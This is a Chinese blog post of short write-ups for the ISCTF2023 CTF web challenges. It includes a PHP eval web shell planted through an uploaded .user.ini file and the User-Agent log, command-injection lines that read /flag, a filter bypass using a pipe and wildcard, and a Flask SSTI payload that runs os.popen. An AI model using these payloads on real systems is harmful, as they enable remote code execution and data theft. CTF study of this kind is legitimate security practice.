[WP] ISCTF2023 Web 部分题解

最新推荐文章于 2023-12-24 21:17:08 发布
最新推荐文章于 2023-12-24 21:17:08 发布
阅读量729 收藏 10
点赞数 8
分类专栏: writeup 文章标签: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63138919/article/details/134737916
版权

圣杯战争!!!

反序列化+伪协议读取

 where_is_the_flag

环境变量+根目录+当前目录

绕进你的心里

利用正则最大回溯绕过

easy_website

or select 用双写绕过 空格用/**/绕,报错注入

wafr 

code=system('ca\t /f*')

webinclude 

扫描得到index.bak备份文件打开为加密的代码 写个逆向脚本再反求parameter即可

JavaScript
const hash = 'dxdydxdudxdtdxeadxekdxea';

function string_to_int_array(str) {
  const intArr = [];
  for (let i = 0; i < str.length; i++) {
    intArr.push(str.charCodeAt(i) - 97);
  }
  return intArr;
}

function int_array_to_string(int_array) {
  let str = '';
  for (let i = 0; i < int_array.length; i += 2) {
    const charcode = int_array[i] * 26 + int_array[i + 1];
    str += String.fromCharCode(charcode);
  }
  return str;
}

console.log(int_array_to_string(string_to_int_array(int_array_to_string(string_to_int_array(hash)))));

得到参数名 直接伪协议读取flag.php 

ez_ini

ini文件上传 +UA头添加木马

.user.ini 文件:

GIF89A
auto_append_file="/var/log/nginx/access.log"

木马: 

<?php @eval($_POST['wenda']);?

然后远程命令执行就行了

POST:

wenda=system('tac /flag');

 注意一下上传ini文件的时候 type类型要改成image/jpeg 或者/image/png 类型】

或者直接ini 文件直接读取file:///flag 就行

auto_prepend_file=file:///flag

fuzz!

通配符【】绕过 字符过滤 管道符| 拼接命令

?file=|tac /fl[a-z]ggggggg.txt

恐怖G7

ssti注入:

{{url_for.__globals__['__builtins__']['eval']("__import__('os').popen('env').read()")}}

 

W3nd4L0v3
关注
  • 8
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
ISCC2023 web复现——老狼老狼几点了&where_is_you_love
m0_64016126的博客
01-13 1489
老狼老狼几点了 :主要考点 session序列化字符串逃逸和md5强绕过 where_is_you_love:主要考点 POP链,RSA算法 (由于没环境我只复现POP链)
题目2-1 where is the flag
博客地址 www.sec0nd.top
07-26 1947
对照启明星辰网络空间安全学院编著的《CTF安全竞赛入门》靶场和解题思路 考查点:网页源代码 右键查看源代码
2023iscc线上赛web_wp
q1415500189的博客
06-28 1040
纯前端题目,ctrl+s保存前端代码到本地,点击url那里在ctrl+s就行在vue.global.js搜alert,就能找到falg,两次base64编码。
bugku where is flag 4杂项
w2500403927的博客
04-29 562
1.base64解码 下载压缩包下来解压打开 发现里面是base64加密 在kali中解码(去掉所有换行符) 用winhex打开 发现十六进制的奇数位正好可以构成zip的文件头(504b) 2.脚本编写 写个python脚本提取奇数位 str1 = '5D0346B8073D0C4A114C01050328050C0E810F0CFF0C94986E3A5E38105909B837EDD98B35880D040D090C093F89080203010607068D0C0A0E0204.
2023线上ISCC 部分WP
DDD_Simple的博客
05-31 2794
通过网址打开游戏界面,发现鼠标右键失灵,无法直接打开页面源代码。随意打开一个已知页面的源代码,发现有view-source:字样,在游戏界面的网址前加上view-sourc:打开页面源代码。发现一串字符使用base64加密解密后是个假的flag有两个可打开文件,flag肯定在这两个中打开index.css文件未发现任何东西故接着打开另一个vue.global.js文件,文件内容很多,快捷键Ctrl+F全局搜索,发现base64字符串经过两次base64解密得到正确的flag。
西普WEB部分题解
12-09
西普WEB部分题解,需要在西普刷题的CTF小伙伴赶紧下载吧
ICPC2023 西安区域赛 题解.pdf
11-09
ICPC2023 西安区域赛 题解 本文档提供了 ICPC2023 西安区域赛的题解,涵盖了五个题目:A - An Easy Geometry Problem、B - Counting Multisets、C - Counting Strings、D - Deep Intervals 和 E - Dominating Point...
2023.9.9题解fdafafasffas
09-09
"2023.9.9题解fdafafasffas" 本资源主要讨论了五道题目,其中包括幻方数、线性拟合、去括号、数列求和和中位数等。 首先,幻方数的问题可以使用枚举平方根的方法解决,而不是直接枚举整数。这个方法可以避免浮点...
CCPC-Online-2023-题解.pdf
08-20
CCPC-Online-2023 题解 本资源是 CCPC Online 2023 网络赛题解,由 Claris、quailty、tangjz 等作者编写,包含了四道题目的解析,即 Almost Prefix Concatenation、Palindromic Beads、CClique Challenge 和 ...
含有历年来天梯赛部分题解
最新发布
03-05
每题上方为题目序号,代码为题解部分题解有另法
whereistheflag:WHAAAAAT ?????????????????????
02-10
旗帜在哪里 WHAAAAAT ???????????????????????? /
ISCTF2023-web方向
J1ng_Hong的博客
11-29 1600
进入/flag.php发现里面是空的,再结合题目名字,那么就是include文件包含里的php伪协议读取信息流了。他是include文件包含,我直接尝试了flag.php,发现没东西。这题写的时候,看到了ini,就想到了**.user.ini**开后门,使文本能够执行php命令。然后用oorrder by测出只有一列的数据,那么回显点肯定就是这一列了,所以就正常注入就有了。尝试了好多天,还是做不出来。进题是一个登录界面,这种界面目前我遇到的只有三种可能,一种是爆破,一种是SQL注入,一种是SSTI注入。
ISCC2023 web复现——小周的密码锁
m0_64016126的博客
12-24 1164
ISCC2023 web复现——小周的密码锁
【虚空】【ISCTF2023】ISCTF2023 Web方向全题目wp
qq_42557115的博客
11-30 1300
ISCTF2023 Web方向全wp
攻防世界-web-新手练习区(1)
wyj_1216 House
05-03 6132
view source 题目 Where is the FLAG 查看页面源代码,但是右键好像不管用了~ writeup F12查看,发现flag get post 题目 GET&POST writeup 首先用GET方式提交一个名为a,值为1的变量 在Firefox中,有个很好用的HackBar 再按照提示,以POST方式提交一个名为b,值为2的变量 得到flag~ 知识点 1、H...
CTF题解三 逆向 where is your flag(ISCC2017)
LJFYYJ的博客
07-11 2983
直接进入test函数: 下面的代码进行第一步操作: 首先a1的长度应该为19。 接下来对s2进行异或处理。 题目中给出的s2的值如下: s2 = 0x3929531D01070A00LL; v4 = 0x391257391F150703LL; v5 = 0x150F; v6 = 0x1B; s2是int64类型,共有8个字节。由于s2、v4、v5和v6的地址是相连的,所以当...
ISCC2017 where is your flag
烟敛寒林的博客
04-25 700
猜测是sql注入的题,先测试一下 一开始测试id,结果发现消失,看来id是注入点 但之后无论怎么尝试都没见回显,一开始以为都被过滤,但后来经测试不是,猜测可能是'被转义了 果真报错了,直接利用报错注入即可 在这里需要分片一下 不过其实还有简单的,通过扫目录发现有个flag.php有句提示 这都已经说明了thisisflag是列名,flag是表名 反正得到flag f...
whereisflag
weixin_52034946的博客
03-07 543
刚打开都是数字,一脸懵,试着换成char类型,然后大端序拼接得到flag CnHongKe{849bc02af213b4d}
ISCC2017部分题目wp
热门推荐
xuqi7
05-26 1万+
比赛网址:http://iscc.isclab.org.cn 小菜做的一些题
2023国赛C题解题思路
09-09
2023国赛C题的解题思路如下: 首先,我们需要理解题目的要求。假设题目要求我们解决一个问题,我们需要根据给定的输入数据,输出相应的结果。 接下来,我们需要分析题目给出的输入数据和要求的输出结果之间的关系...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

W3nd4L0v3

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值